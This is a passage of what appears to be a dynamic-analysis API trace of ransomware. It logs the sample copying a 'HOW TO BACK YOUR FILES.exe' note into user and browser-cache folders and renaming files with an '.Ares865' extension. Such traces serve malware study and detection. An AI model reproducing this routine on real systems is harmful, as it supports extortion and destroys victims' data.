nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.513] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.513] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.514] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.Word", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.Word") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.Word" [0104.514] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.Word" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.Word") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.Word" [0104.514] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.514] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.Word\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\content.word\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.514] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.515] GetLastError () returned 0x0 [0104.515] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.517] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.Word\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0xe7138400, ftCreationTime.dwHighDateTime=0x1d2e625, ftLastAccessTime.dwLowDateTime=0x4d66d040, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d66d040, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.517] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.517] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.518] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.MSO", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.MSO") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.MSO" [0104.518] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.MSO" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.MSO") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.MSO" [0104.518] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.518] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.MSO\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\content.mso\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.518] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.519] GetLastError () returned 0x0 [0104.519] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.519] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.MSO\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x2dbf3370, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d6931a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6931a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.519] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.519] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.519] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5" [0104.519] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5" [0104.520] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.520] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\content.ie5\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.520] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.521] GetLastError () returned 0x0 [0104.521] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.521] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b5ebfe0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b5ebfe0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.521] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.521] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.521] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865") returned 116 [0104.521] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\content.ie5\\index.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\content.ie5\\index.dat.ares865"), dwFlags=0x1) returned 0 [0104.521] GetLastError () returned 0x20 [0104.521] wsprintfA (in: param_1=0x2ccd7d8, param_2="[ERROR] %S MoveFileEx error %i\r\n" | out: param_1="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 138 [0104.522] lstrlenA (lpString="[ERROR] C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\index.dat MoveFileEx error 32\r\n") returned 138 [0104.522] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ids.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ids.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0104.522] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x5c8c [0104.522] WriteFile (in: hFile=0x118, lpBuffer=0x2ccd7d8*, nNumberOfBytesToWrite=0x8a, lpNumberOfBytesWritten=0x2ccd174, lpOverlapped=0x0 | out: lpBuffer=0x2ccd7d8*, lpNumberOfBytesWritten=0x2ccd174*=0x8a, lpOverlapped=0x0) returned 1 [0104.523] CloseHandle (hObject=0x118) returned 1 [0104.523] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0104.523] CloseHandle (hObject=0x0) returned 0 [0104.523] CloseHandle (hObject=0x0) returned 0 [0104.523] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM5O9XQS", cAlternateFileName="")) returned 1 [0104.523] lstrcmpiW (lpString1="MM5O9XQS", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0104.523] lstrcmpiW (lpString1="MM5O9XQS", lpString2="aoldtz.exe") returned 1 [0104.523] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0104.523] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109" [0104.523] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.523] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\content.ie5\\x9ohk109\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.524] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.524] GetLastError () returned 0x0 [0104.525] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.525] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\X9OHK109\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b612140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b612140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.525] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.525] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.525] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0104.525] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C" [0104.525] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.525] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\content.ie5\\rijuql1c\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.526] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.526] GetLastError () returned 0x0 [0104.526] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.526] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\RIJUQL1C\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b612140, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b612140, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.526] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.527] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.527] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0104.527] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K" [0104.527] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.527] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\content.ie5\\pmmr5k9k\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.528] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.528] GetLastError () returned 0x0 [0104.528] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.528] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\PMMR5K9K\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.528] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.528] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.528] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0104.529] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS" [0104.529] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.529] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\temporary internet files\\content.ie5\\mm5o9xqs\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.529] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.530] GetLastError () returned 0x0 [0104.530] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.530] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Temporary Internet Files\\Content.IE5\\MM5O9XQS\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6b6382a0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6b6382a0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.530] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.530] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.530] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla" [0104.530] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla" [0104.530] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.530] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.531] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.531] GetLastError () returned 0x0 [0104.531] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.532] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4d6df460, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d6df460, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.532] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.532] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.532] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates" [0104.532] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates" [0104.532] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.532] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Mozilla\\updates\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\mozilla\\updates\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.533] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.533] GetLastError () returned 0x0 [0104.533] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.533] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS 